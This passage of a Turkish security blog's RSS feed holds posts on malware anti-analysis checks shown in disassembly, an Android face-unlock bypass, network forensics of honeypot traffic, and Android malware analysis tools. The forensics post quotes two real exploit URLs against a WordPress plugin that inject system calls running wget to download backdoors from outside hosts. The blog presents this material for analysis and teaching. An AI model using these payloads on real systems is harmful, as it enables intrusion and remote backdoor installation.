00407D61 . B8 907D4000 MOV EAX,cyber_se.00407D90 ; ASCII &#8220;\\.\SyserDbgMsg&#8221;<br />
00407D66 . E8 B9FFFFFF CALL cyber_se.00407D24<br />
00407D6B . 84C0 TEST AL,AL<br />
00407D6D . 75 0E JNZ SHORT cyber_se.00407D7D<br />
00407D6F . B8 A07D4000 MOV EAX,cyber_se.00407DA0 ; ASCII &#8220;\\.\SyserBoot&#8221;</p>
<p><strong>TickCount</strong><br />
0040D7C5 |. E8 0A7DFFFF CALL ; [GetTickCount<br />
0040D7CA |. 8BD8 MOV EBX,EAX<br />
0040D7CC |. B8 04774000 MOV EAX,cyber_se.00407704 ; Entry address<br />
0040D7D1 |. E8 16A5FFFF CALL cyber_se.00407CEC ; ?<br />
0040D7D6 |. 84C0 TEST AL,AL<br />
....<br />
0040D911 |. E8 BE7BFFFF CALL ; [GetTickCount<br />
0040D916 |. 33D2 XOR EDX,EDX<br />
0040D918 |. 52 PUSH EDX<br />
0040D919 |. 50 PUSH EAX<br />
0040D91A |. 8BC3 MOV EAX,EBX<br />
0040D91C |. 99 CDQ<br />
0040D91D |. 290424 SUB DWORD PTR SS:[ESP],EAX<br />
0040D920 |. 195424 04 SBB DWORD PTR SS:[ESP+4],EDX<br />
0040D924 |. 58 POP EAX<br />
0040D925 |. 5A POP EDX<br />
0040D926 |. 83FA 00 CMP EDX,0<br />
0040D929 |. 75 09 JNZ SHORT cyber_se.0040D934<br />
0040D92B |. 3D 88130000 CMP EAX,1388<br />
0040D930 |. 76 0B JBE SHORT cyber_se.0040D93D<br />
0040D932 |. EB 02 JMP SHORT cyber_se.0040D936<br />
0040D934 |&gt; 7E 07 JLE SHORT cyber_se.0040D93D<br />
0040D936 |&gt; 6A 00 PUSH 0 ; /ExitCode = 0<br />
0040D938 |. E8 1F7BFFFF CALL ; \ExitProcess</p>
<p>Piyasada yer alan çoğu zararlı yazılımın yıllardır aynı anti analiz kodlarını içerdiği düşünüldüğünde bu kodlar üzerinde bol bol pratik yapmış olan zararlı yazılım analisti için bu kontrolleri tespit etmek ve aşmak sadece birkaç dakika sürmektedir.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/antiem11.jpg" alt="Anti Codes" /></p>
<p>Bu tür kodların kullanım amacı her ne kadar zararlı yazılım analistinin işini zorlaştırmak olsa da motive olmuş bir zararlı yazılım analistini bu tür kontroller ile durdurmak hiçbir zaman mümkün değildir.</p>
<p>Bu vesileyle herkesin 23 Nisan Ulusal Egemenlik ve Çocuk Bayramı&#8217;nı kutlar bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mertsarica.com/?feed=rss2&#038;p=2954</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Android 4.0 Yüz Kilidi Nasıl Aşılır ?</title>
		<link>http://www.mertsarica.com/?p=2906</link>
		<comments>http://www.mertsarica.com/?p=2906#comments</comments>
		<pubDate>Wed, 18 Apr 2012 20:09:01 +0000</pubDate>
		<dc:creator>M.S</dc:creator>
				<category><![CDATA[Güvenlik]]></category>

		<guid isPermaLink="false">http://www.mertsarica.com/?p=2906</guid>
		<description><![CDATA[Bildiğiniz üzere Android 4.0 (Ice Cream Sandwich) yüz tanıma özelliği ile birlikte gelmekte ve ekran kilidini açma unsuru olarak yüzünüz de (yüz kilidi) kullanılabilmektedir ancak yüzünüz yerine yüzünüzün yüksek çözünürlüklü bir fotoğrafının kullanılması durumunda da ekran kilidi açılmakta ve ortaya bir güvenlik zafiyeti çıkmaktadır. Google tarafından da belirtildiği üzere düşük güvenlik seviyesine sahip bu yüz [...]]]></description>
			<content:encoded><![CDATA[<p>Bildiğiniz üzere Android 4.0 (Ice Cream Sandwich) yüz tanıma özelliği ile birlikte gelmekte ve ekran kilidini açma unsuru olarak yüzünüz de (yüz kilidi) kullanılabilmektedir ancak yüzünüz yerine yüzünüzün yüksek çözünürlüklü bir fotoğrafının kullanılması durumunda da ekran kilidi açılmakta ve ortaya bir güvenlik zafiyeti çıkmaktadır. Google tarafından da belirtildiği üzere düşük güvenlik seviyesine sahip bu yüz kilidinin, telefonlarının güvenliğine önem verenler tarafından kullanılmaması şiddetle tavsiye edilir.</p>
<p>Google tarafından belirtilen ekran kilitlerinin güvenlik seviyeleri aşağıda yer almaktadır;</p>
<ul>
<li>Sifre: Yüksek güvenlik</li>
<li>Pin: Orta ve Yüksek güvenlik</li>
<li>Model &#8211; Orta güvenlik</li>
<li>Yüz kilidi &#8211; Düşük güvenlik</li>
</ul>
<p>Bilgi güvenliği farkındalığını arttırma adına çalışma arkadaşım Cem ÖNAL ile birlikte eğlenceli bir video hazırladım, herkese keyifli seyirler dilerim.</p>
<p>(Videoyu tam ekran izleyebilmek için iki defa üzerine basmanız yeterlidir)<br />
<a href="http://www.mertsarica.com/?p=2906#mediaPlayer_2906_0">Videoyu oynat</a><br />
(Linux kullanıcısı iseniz videoyu izlemek için <a href="http://www.mertsarica.com/videos/android_fr_bypass.wmv" target="_blank">buraya</a> tıklayın)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mertsarica.com/?feed=rss2&#038;p=2906</wfw:commentRss>
		<slash:comments>0</slash:comments>
<enclosure url="http://www.mertsarica.com/videos/android_fr_bypass.wmv" length="15741558" type="video/asf" />
		</item>
		<item>
		<title>Ağ Trafiğinde Adli Bilişim Analizi</title>
		<link>http://www.mertsarica.com/?p=2803</link>
		<comments>http://www.mertsarica.com/?p=2803#comments</comments>
		<pubDate>Sun, 18 Mar 2012 13:27:30 +0000</pubDate>
		<dc:creator>M.S</dc:creator>
				<category><![CDATA[Güvenlik]]></category>

		<guid isPermaLink="false">http://www.mertsarica.com/?p=2803</guid>
		<description><![CDATA[Network Forensics, Türkçe meali ile bilgisayar ağlarında adli bilişim, temel olarak ağ trafiğinin analiz edilmesine dayanmaktadır. Post-mortem (olay/vaka sonrası) gerçekleştirilebilmesi nedeniyle analiz için ateş duvarı (firewall), saldırı tespit/engelleme sistemi (ids/ips), bal küpü (honeypot) vb. ağ trafik kaydı tutan cihazların ve sistemlerin kayıtlarına ihtiyaç duyulmaktadır. Kayıtların analizi için Snort, ngrep, tcpdump, NetworkMiner, Wireshark, tcpxtract, Netwitness Investigator, [...]]]></description>
			<content:encoded><![CDATA[<p>Network Forensics, Türkçe meali ile bilgisayar ağlarında adli bilişim, temel olarak ağ trafiğinin analiz edilmesine dayanmaktadır. Post-mortem (olay/vaka sonrası) gerçekleştirilebilmesi nedeniyle analiz için ateş duvarı (firewall), saldırı tespit/engelleme sistemi (ids/ips), bal küpü (honeypot) vb. ağ trafik kaydı tutan cihazların ve sistemlerin kayıtlarına ihtiyaç duyulmaktadır. Kayıtların analizi için <a href="http://www.snort.org/" target="_blank">Snort</a>, <a href="http://ngrep.sourceforge.net/" target="_blank">ngrep</a>, <a href="http://www.tcpdump.org" target="_blank">tcpdump</a>, <a href="http://www.netresec.com/?page=NetworkMiner" target="_blank">NetworkMiner</a>, <a href="http://www.wireshark.org/" target="_blank">Wireshark</a>, <a href="http://tcpxtract.sourceforge.net/" target="_blank">tcpxtract</a>, <a href="http://netwitness.com/products-services/investigator-freeware" target="_blank">Netwitness Investigator</a>, <a href="http://www.xplico.org/" target="_blank">Xplico</a> vb. çeşitli yazılımlardan faydalanılmaktadır.</p>
<p>Bilgi Güvenliği AKADEMİSİ, Şubat ayında tamamı internet üzerindeki bal küpü (honeypot) / <a href="http://en.wikipedia.org/wiki/Capture_the_flag#Computer_security" target="_blank">CTF</a> sistemlerinden elde edilmiş ~20 GB’lık(5 DVD) trafik dosyalarını konuya meraklı sektör çalışanlarıyla <a href="http://blog.bga.com.tr/genel/network-forensic-calismalari-icin-gercek-sistemlerden-alinmis-trafik-dosyalari" target="_blank">paylaşma kararı</a> aldı. Ben de bahsi geçen meraklılardan biri olarak Ömer ALBAYRAK&#8217;dan temin ettiğim DVDler&#8217;de yer alan dosyalara kısaca göz atmaya ve başarılı olan sızma girişimlerinden birini (geri kalanlarını meraklılara bırakıyorum) tespit etmeye karar verdim.</p>
<p>Her biri yaklaşık 1 GB olan 20 tane PCAP dosyasında, başarılı olan sızma girişimlerini aramanın samanlıkta iğne aramaktan farklı olmayacağını düşünerek daha akılcı bir yol izleyerek elimdeki tüm PCAP dosyalarını Snort saldırı tespit sistemine yönlendirmenin işlerimi kolaylaştıracağı düşüncesi ile sanal makineye üzerinde <a href="http://www.snort.org/" target="_blank">Snort</a>, <a href="http://nmap.org/" target="_blank">nmap</a>, <a href="http://www.tenable.com/" target="_blank">Nessus</a> ve <a href="http://www.networksecuritytoolkit.org/nst/links.html" target="_blank">birçok</a> açık kaynak kodlu ağ güvenliği uygulamalarını barındıran Network Security Toolkit (NST) işletim sistemini kurdum.</p>
<blockquote><p>Normal şartlarda elimde boyut olarak ufak ve sayıca az PCAP dosyaları olmuş olsaydı, <a href="http://www.backtrack-linux.org/" target="_blank">Backtrack 5 R2</a> işletim sistemi üzerinde yer alan Wireshark, tcpdump ve ngrep gibi araçlar ile analizi rahatlıkla gerçekleştirebilirdim.</p></blockquote>
<p>NST işletim sistemini sanal makineye kurduktan ve Snort servisini çalıştırdıktan sonra sıra 20 adet PCAP dosyasını bu sisteme gönderecek (packet replay) aracı bulmaya ve kullanmaya gelmişti. Bunun için daha önce birçok testte kullanmış olduğum Colasoft&#8217;un <a href="http://www.colasoft.com/packet_player/" target="_blank">Packet Player</a> aracını kullanmaya karar verdim. NST otomatik olarak ağ bağdaştırıcılarını (network adapters) <a href="http://en.wikipedia.org/wiki/Promiscuous_mode" target="_blank">promiscuous</a> kipte (mode) başlattığı için paketleri bu araç ile Snort kurulu NST sistemine göndermeye başladım.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/nefe5.jpg" alt="Network Forensic" /></p>
<p>4 saatten fazla süren paket gönderim işlemi tamamlandıktan sonra Snort tarafından üretilen alarmlar analiz edilmeye hazır hale geldi.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/nefe11.jpg" alt="Network Forensic" /></p>
<p>Saldırganlar ve saldırıya uğrayan sistemler hakkında en ufak bir fikrim olmadığı için en çok tekil alarm üreten hedef ve kaynak ip adresleri üzerine yoğunlaştığımda hedef olarak bir ip adresi (potansiyel sunucu), kaynak olarak ise bir kaç ip adresi (potansiyel saldırganlar) ortaya çıktı.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/nefe24.jpg" alt="Network Forensic" /></p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/nefe25.jpg" alt="Network Forensic" /></p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/nefe26.jpg" alt="Network Forensic" /></p>
<p>ngrep aracı ile Snort üzerinde tespit edilen potansiyel saldırgan ip adreslerini her bir PCAP dosyasında ayrı ayrı aramamak adına diğer bir sanal makinede kurulu olan <a href="http://www.backtrack-linux.org/" target="_blank">Backtrack 5 R2</a> işletim sistemi üzerinde Wireshark aracı ile birlikte gelen mergecap aracı ile hepsini tek bir dosyaya çevirdim.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/nefe14.jpg" alt="Network Forensic" /></p>
<p>Ardından tespit edilen potansiyel saldırgan ip adresleri arasında en çok tekil alarm üreten ip adresini (195.174.37.105) ngrep ile CTF.pcap dosyasında yer alan TCP paketlerinde (UDP paketlerini göz ardı ettim) aratarak sızma girişimi hakkında detaylı bilgi edinmeye başladım.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/nefe40.jpg" alt="Network Forensic" /></p>
<p><strong>95.173.186.116 (saldırıya uğrayan sunucu):</strong></p>
<ul>
<li>İşletim sistemi CentOS</li>
<li>Üzerinde Apache 2.2.3 ve PHP v5.1.6 ve WordPress bulunuyor.</li>
</ul>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/nefe35.jpg" alt="Network Forensic" /></p>
<p><strong>195.174.37.105 (potansiyel saldırganlardan biri):</strong></p>
<ul>
<li>İlk olarak 29.05.2011 tarihinde saat 08:18&#8242;de sunucu ile bağlantı kuruyor.</li>
<li>İlk olarak 29.05.2011 tarihinde saat 08:29&#8242;da sunucuyu Nikto v2.1.4 ile tarıyor.</li>
<li>29.05.2012 tarihinde saat 20:44&#8242;de WordPress&#8217;in <a href="http://www.exploit-db.com/exploits/17299/" target="_blank">is-human</a> eklentisinde bulunan zafiyeti istismar ederek sistem üzerinde uzaktan komutlar çalıştırıyor.</li>
<li>29.05.2012 tarihinde saat 21:33&#8242;de wget aracı ile Packetstorm sitesinden 60000. bağlantı noktasında (port) dinleyen <a href="http://dl.packetstormsecurity.net/groups/synnergy/bindshell-unix" target="_blank">bindshell-unix</a> arka kapısı indiriyor ancak arka kapıya bağlandıktan sonra komut sonrasına noktalı virgül koymadığı için (ls -al;) arka kapının çalışmadığını sanıyor. ( /wp-content/plugins/is-human/engine.php?action=log-reset&amp;type=ih_options();eval(stripslashes($_GET[a]));<br />
error&amp;a=echo%20%22%3Cpre%3E%22;system(%27cd%20/tmp;wget%2 0http://dl.packetstormsecurity.net/groups/synnergy/bindshell-unix%20xxx.pl%27); )</li>
<li>Bu defa 29.05.2012 tarihinde saat 21:47&#8242;de wget aracı ile Vigasis isimli bir siteden 16667 numaralı bağlantı noktasında (port) dinleyen evil.c arka kapısını indiriyor, derliyor, çalıştırıyor ve sisteme bağlanıyor. ( /wp-content/plugins/is-human/engine.php?action=log-reset&amp;type=ih_options();eval(stripslashes($_GET[a]));error&amp;<br />
a=echo%20%22%3Cpre%3E%22;system(%27cd%20/tmp;wget%20http://www.vigasis.com/evil.c.txt%20-o%20evil.c%27); )</li>
<li>Daha sonra çeşitli yetki yükseltmeye yarayan çekirdek istismar araçlarını denese de root yetkisine sahip olamıyor ve kayıt sonlanıyor.</li>
</ul>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/nefe36.jpg" alt="Network Forensic" /></p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/nefe39.jpg" alt="Network Forensic" /></p>
<p>Sonuç itibariyle ağ trafik kayıtlarını analiz ederek başarılı bir sızmanın nasıl gerçekleştirildiği konusunda çok detaylı bilgiler elde edebilirsiniz. Umarım meraklı arkadaşlar için gerçekleştirmiş olduğum bu analiz faydalı olmuştur. Pratik yapmak isteyenlerin BGA&#8217;dan bu DVDler&#8217;i ücretsiz olarak temin etmelerini şiddetle tavsiye ederim. (<em>Sınırlı sayıda bulunan DVD&#8217;ler tükenmiştir. Kayıt dosyalarını edinmek isteyenler BGA İstanbul ofisine giderek DVD çekimi yapabilirler.</em>)</p>
<p>Bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mertsarica.com/?feed=rss2&#038;p=2803</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Euroforensics 2012 Adli Bilimler Konferansı ve Sergisi</title>
		<link>http://www.mertsarica.com/?p=2789</link>
		<comments>http://www.mertsarica.com/?p=2789#comments</comments>
		<pubDate>Mon, 05 Mar 2012 07:45:33 +0000</pubDate>
		<dc:creator>M.S</dc:creator>
				<category><![CDATA[Duyurular]]></category>

		<guid isPermaLink="false">http://www.mertsarica.com/?p=2789</guid>
		<description><![CDATA[31 Mart Cumartesi günü Euroforensics 2012 Adli Bilimler Konferansı ve Sergisinde, Saat 11:00&#8242;da, Fevzi Çakmak salonunda, Android Zararlı Yazılım Analizi üzerine bir sunum gerçekleştireceğim, meraklılarına duyurulur :) Euroforensics 2012 Adli Bilimler Konferansı ve Sergisi, 29 – 31 Mart 2012 tarihlerinde İstanbul Harbiye Askeri Müze ve Kültür Sitesi’nde gerçekleştirilecektir. EuroForensics etkinliği adli bilişim, adli tıp ve [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>31 Mart Cumartesi günü Euroforensics 2012 Adli Bilimler Konferansı ve Sergisinde, Saat 11:00&#8242;da, Fevzi Çakmak salonunda, Android Zararlı Yazılım Analizi üzerine bir sunum gerçekleştireceğim, meraklılarına duyurulur :)</p></blockquote>
<p><a href="http://www.euroforensics.com" target="_blank">Euroforensics</a> 2012 Adli Bilimler Konferansı ve Sergisi, 29 – 31 Mart 2012 tarihlerinde İstanbul Harbiye Askeri Müze ve Kültür Sitesi’nde gerçekleştirilecektir.  EuroForensics etkinliği adli bilişim, adli tıp ve adli muhasebe ürünlerini, hizmetlerini ve konu ile ilgili tüm profesyonelleri bir araya getiren bir platformdur.</p>
<p>Euroforensics Konferansı esnasında adli bilişim, adli muhasebe, adli tıp ve olay yeri inceleme konularında eş zamanlı oturumlar düzenlenmektedir. Adli Bilişim oturumlarında ; bilgisayar inceleme, internet güvenliği , siber terörizm, siber güvenlik,şifre kurtarma, ses ve video inceleme, biyometri, doküman inceleme, bilgi güvenliği, istihbarat toplama , kriptoloji , mobil inceleme yer alan konulardan bazılarıdır. Adli muhasebe oturumlarında ; Hile ve suistimali önleme, internet bankacılık suistimalleri, kara para aklama, Adli Tıp oturumlarında ise DNA analizi, olay yeri inceleme yer alan konulardan bazılarıdır.</p>
<p>Konferans esnasında kolluk kuvvetlerine özel bir gün ayırılacaktır. Bu özel gün içerisinde ziyaretçiler görevleri ve kurumları göz önünde bulundurularak katılabilecekleri iki mikro konferans düzenlenecektir. <strong>1. Uluslararası Siber Savaş,Terör ve Suçla Mücadele Konferansı</strong>; Mevcut siber tehditler ve önlenme stratejileri, yakın gelecekte karşılaşılabilecek siber tehditler, siber suçlardaki son trendler, offensive güvenliğin zorlukları, sosyal ağların soruşturulması ve incelenmesi konferans dahilindeki konu başlıklarından bazılarıdır. <strong>1.Uluslararası Olay Yeri İnceleme Konferansı</strong>; Touch DNA Analizi , adli fotoğrafçılık , olay yerinin yeniden canlandırılması konferans dahilindeki konu başlıklarından bazılarıdır.</p>
<p>Euroforensics 2012 etkinliği T.C. Başbakanlığı TİKA (Türk İşbirliği ve Kalkınma İdaresi Başkanlığı), T.C. Bilgi Teknolojileri ve İletişim Kurumu (BTK), ISACA Istanbul  Chapter, Türkiye Etik ve İtibar Derneği (TEID), Emniyet Genel Müdürlüğü Kriminal Polis Laboratuvarları, Bankalararası Kart Merkezi, Türkiye Bankalar Birliği ve Adli Tıp Kurumu tarafından desteklenmektedir.</p>
<p>Etkinliğe katılmak isteyenler derya@forensicpeople.com email adresine email gönderebilirler.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mertsarica.com/?feed=rss2&#038;p=2789</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Android Zararlı Yazılım Analizi</title>
		<link>http://www.mertsarica.com/?p=2716</link>
		<comments>http://www.mertsarica.com/?p=2716#comments</comments>
		<pubDate>Sat, 25 Feb 2012 17:15:28 +0000</pubDate>
		<dc:creator>M.S</dc:creator>
				<category><![CDATA[Güvenlik]]></category>

		<guid isPermaLink="false">http://www.mertsarica.com/?p=2716</guid>
		<description><![CDATA[2011 yılının son aylarında güvenlik firmaları tarafından yayınlanan mobil tehdit raporlarında Android işletim sisteminin rakiplerine göre çok daha fazla zararlı yazılım istilasına uğradığına dikkat çekiliyordu. Juniper firması tarafından yapılan araştırmaya göre 2009 ile 2010 yılları arasında akıllı telefonları hedef alan zararlı yazılımların %250 artış gösterdiği, 2011 yılının Temmuz ayı ile Kasım ayı arasında ise %472 [...]]]></description>
			<content:encoded><![CDATA[<p>2011 yılının son aylarında güvenlik firmaları tarafından yayınlanan mobil tehdit raporlarında Android işletim sisteminin rakiplerine göre çok daha fazla zararlı yazılım istilasına uğradığına dikkat çekiliyordu. Juniper firması tarafından yapılan araştırmaya göre 2009 ile 2010 yılları arasında akıllı telefonları hedef alan zararlı yazılımların %250 artış gösterdiği, 2011 yılının Temmuz ayı ile Kasım ayı arasında ise %472 artış gösterdiği sonucu ortaya çıkıyordu. Juniper firması tarafından yayınlanan bir başka raporda ise 2011 yılının son 7 ayında Android işletim sistemini hedef alan zararlı yazılımlardaki artışın %3,325 olduğu belirtiliyordu!</p>
<p>Gartner&#8217;ın yapmış olduğu bir araştırmaya göre 2011 yılının son çeyreğinde satılan her iki akıllı telefondan birinde Andoid işletim sisteminin kurulu olduğu göz önünde bulundurulduğunda art niyetli kişiler tarafından geliştirilen zararlı yazılımların Android işletim sistemini hedef almasına eminim sizde benim gibi şaşırmıyorsunuzdur.</p>
<p>Android işletim sistemi neden bu kadar kişi ve üretici tarafından tercih ediliyor diye soracak olursanız bunların başında açık kaynak kodlu olması, ücretsiz olması, açık markete (ücretsiz uygulamalar barındıran Android Market) sahip olması, tabii ki Linux 2.6 çekirdeğini kullanıyor olmasının çok büyük rol oynadığını söyleyebiliriz. Durum böyle olunca da bireylerden kurumlara kadar herkesin yeri geldiğinde kullandığı veya kulkanacağı uygulamanın iyi niyetinden şüphe ettiği durumlarda o uygulamayı analiz etmeye ihtiyaç duyabilir.</p>
<p>Analiz yöntemlerine geçmeden önce kısaca Android&#8217;in güvenlik modelinden kısaca bahsetmek istiyorum.</p>
<ul>
<li>Android işletim sisteminde Linux işletimin güvenlik modeli baz alınmıştır. Linux işletim sisteminde bildiğiniz üzere dosyalara verilen izinler kullanıcı bazlıdır ve bir kullanıcı başka bir kullanıcının dosyasını o kullanıcı izin vermediği sürece okuyamaz, değiştiremez ve/veya çalıştıramaz. Android işletim sisteminde de her yeni kurulan uygulamayı yeni bir kullanıcı olarak düşünebilirsiniz. Bir uygulama, diğer bir uygulamaya ait dosyalara dosya sistemi üzerinden ulaşamaz.</li>
<li>Uygulamaların kurulabilmesi için mutlaka dijital sertifika ile (kendinden imzalı (s<em>elf</em>-<em>signed</em>) da olabilir) imzalanmış olması gerekmektedir.</li>
<li>Uygulamalar çalışma esnasında kullanacakları kaynaklara, erişecekleri alanlara göre kurulum esnasında kullanıcıdan bir defaya mahsus olmak üzere izin istemek zorundadırlar. Örneğin bir uygulama, çalışabilmesi için internet bağlantısına ihtiyaç duyuyor ise kurulum esnasında bunu beyan etmek ve kullanıcıdan bu izni istemek zorundadır. İzinler, APK (Android application package) içinde yer alan AndroidManifest.xml dosyası içinde tanımlanmaktadır.<br />
<img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/android2.jpg" alt="Android Zararlı Yazılım Analizi"/>
</li>
<li>Kurulan her bir uygulama ayrı bir Dalvik sanal makinesinde çalışmaktadır.</li>
</ul>
<p>Peki zararlı bir yazılım, Android işletim sistemine hangi yollarla bulaşabilir ?</p>
<ul>
<li>Uzaktan kurulum ile: <a href="https://market.android.com" target="_blank">Android Market</a> web sayfası üzerinden cep telefonunuza seçtiğiniz herhangi bir uygulamayı yükleyebilirsiniz. Art niyetli bir kişi tarafından Gmail şifrenizin çalındığını ve isterse bu şifre ile cep telefonunuza internet bankacılığına giriş yaparken kullandığınız tek kullanımlık SMS mesajlarını çalan bir truva atını yükleyebileceğini düşündüğünüzde ister istemez bu özellik sizi korkutuyor.</li>
<li>Market üzerinden: Bildiğiniz üzere Android Market&#8217;e isteyen herkes (25$ ödeyerek sahip olunan bir geliştirici hesabı yeterlidir) geliştirmiş olduğu uygulamayı yükleyebilmekte ve kullanıcıların kullanımına sunabilmektedir. Durum böyle olunca da hangi uygulama güvenilir hangisi değil bunu anlamak pek mümkün olmamamaktadır. Her ne kadar Google bu duruma bir  dur demek için Bouncer adında ki zararlı uygulama tarayıcı hizmetini devreye almış olsa da, Apple gibi manuel olarak kod incelemesi yapmadığı sürece zararlı yazılımlar Android Market&#8217;i istila etmeye devam edecektir.</li>
<li>Android SDK ile: Android SDK, Google tarafından uygulama geliştiricileri (developer) için hazırlanmış ve bünyesinde kütüphaneleri ve hata ayıklayıcı (debugger), öykünücü (emulator) gibi çeşitli araçları barındıran bir yazılım geliştirme kitidir. Bu kit içerisinde yer alan Android Debug Bridge (adb) aracı ile öykünücüye (emulator) veya bağlı olan Android işletim sistemi kurulu cihaza uygulama yüklemek mümkündür.</li>
<li>Internet üzerinden: Web sayfası üzerinden, e-posta eklentisi veya QR kodu ile internet üzerinden indirilen apk dosyası ile Android işletim sistemine uygulama yüklemek mümkündür.</li>
</ul>
<p>APK uzantısına sahip olan Android uygulamaları zip dosya formatına sahiptir ve bu sayede APK uzantılı herhangi bir dosyanın uzantısı ZIP uzantısı olarak değiştirilerek Winzip, Winrar ve benzer dosya sıkıştırma araçları ile açılabilmektir. APK dosyasının açılması durumunda içinden çıkan classes.dex ve AndroidManifest.xml dosyaları analiz için önem taşıyan dosyalardır.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/android1.jpg" alt="Android Zararlı Yazılım Analizi"/></p>
<p>Dex uzantılı classes dosyası, Java ile kodlanmış, Java derleyicisi ile derlenmiş ve dex aracı ile Dalvik sanal makinesinde çalışacak hale dönüştürülmüş Android uygulamasıdır. Piyasada dex dosyasını class dosyasına çeviren <a href="http://code.google.com/p/dex2jar/downloads/list " target="_blank">dex2jar</a> gibi ücretsiz araçlar mevcuttur. Bu araçlar ile kaynak koduna çevrilen (örnek komut: d2j-dex2jar.bat classes.dex) class dosyası rahatlıkla analiz edilebilir.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/android4.jpg" alt="Android Zararlı Yazılım Analizi"/></p>
<p>Bildiğiniz veya bilmediğiniz üzere Java ile kodlanmış programlar kaynak koduna çevrilerek (decompile) analiz edilebilmektedir. Durum böyle olunca da dex formatından class formatına dönüştürülen Android uygulamasını <a href="http://java.decompiler.free.fr/?q=jdgui" target="_blank">JD-GUI</a> ve benzer araçlar ile kaynak koduna geri çevirmek ve analiz etmek mümkündür.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/android5.jpg" alt="Android Zararlı Yazılım Analizi"/></p>
<p>Kimi zaman kaynak koduna çeviren araçlar (decompiler) hatalı çeviri yaparlar. Bu gibi durumlarda dex dosyası, <a href="http://code.google.com/p/android-apktool/downloads/list" target="_blank">apktool</a> gibi araçlar ile tersine çevrilerek (disassembling) (örnek komut: java -jar apktool.jar d BloodvsZombie_com.gamelio.DrawSlasher_1_1.0.1.apk) analiz edilebilmektedir.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/android6.jpg" alt="Android Zararlı Yazılım Analizi"/></p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/android7.jpg" alt="Android Zararlı Yazılım Analizi"/></p>
<p>İzinlere gelecek olursak daha önce de belirttiğim gibi izinler AndroidManifest.xml dosyasında tanımlanmaktadır ancak bu dosya binary formatında olduğu için herhangi bir metin editörü ile görüntülenememektedir bu nedenle <a href="http://code.google.com/p/android4me/downloads/list" target="_blank">AXMLPrinter2.jar</a> gibi araçlar ile okunaklı hale getirilmesi (örnek komut: java -jar AXMLPrinter2.jar AndroidManifest.xml) gerekmektedir. Okunaklı hale getirildikten sonra uygulamanın çalışabilmesi için ihtiyaç duyduğu izinler rahatlıkla analiz edilebilmektedir.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/android3.jpg" alt="Android Zararlı Yazılım Analizi"/></p>
<p>Statik analiz için yukarda bahsetmiş olduğum araçlara ilave olarak <a href="http://www.hex-rays.com/products/ida/index.shtml " target="_blank">IDA Pro v6.1+</a>, <a href="http://code.google.com/p/apkinspector/downloads/list" target="_blank">APKInspector</a>, <a href="http://code.google.com/p/dex-decomplier/downloads/list" target="_blank">Dexdump</a>, <a href="http://code.google.com/p/smali/downloads/list" target="_blank">Smali</a> ve <a href="http://code.google.com/p/androguard/downloads/list" target="_blank">Androguard</a> araçlarından da faydalanabilirsiniz.</p>
<p>Dinamik analiz gerçekleştirmek için Android SDK ile birlikte gelen öykünücüden (emulator) faydalanabilirsiniz ancak zararlı yazılımın servis olarak çalışması ve/veya bazı işlemlerin gerçekleşmesi esnasında çalışma durumu söz konusu olabileceği için görsel ve/veya fonksiyonel olarak öykünücü içinde çalıştırsanız dahi size herhangi bir ipucu vermeyebilir. Bu gibi ihtimallere karşı <a href="http://code.google.com/p/droidbox/downloads/list/" target="_blank">Droidbox</a> aracından faydalanabiliriz. Droidbox, Android uygulamalarını dinamik olarak analiz etmek için geliştirilmiş bir kum havuzu aracıdır. Gelen/giden ağ verileri takibinden, dosya okuma/yazma takibine, Giden SMS ve arama takibinden, sifreleme işlemlerinin takibine kadar sistem üzerinde gerçekleştirilen kritik işlemleri kayıt altına alarak zararlı yazılımın arka planda neler yaptığını rahatlıkla öğrenebilirsiniz.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/android8.jpg" alt="Android Zararlı Yazılım Analizi"/></p>
<p>Görüldüğü üzere Android işletim sistemini hedef alan zararlı yazılımları analiz edebilmek için statik olsun dinamik olsun faydanalabileceğimiz çok sayıda araç bulunmaktadır ve Google, Android Market&#8217;e yüklenen araçları manuel olarak kaynak kod seviyesinde analiz etmemeye devam ettiği sürece bu araçlara çok işimiz düşecektir.</p>
<p>Güvenliğiniz için Android işletim sisteminize mutlaka ama mutlaka bir güvenlik uygulama kurmanızı önerir, bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mertsarica.com/?feed=rss2&#038;p=2716</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Netsec Topluluk Buluşması/ Siber Savaş Aracı Olarak Kötücül Yazılımlar</title>
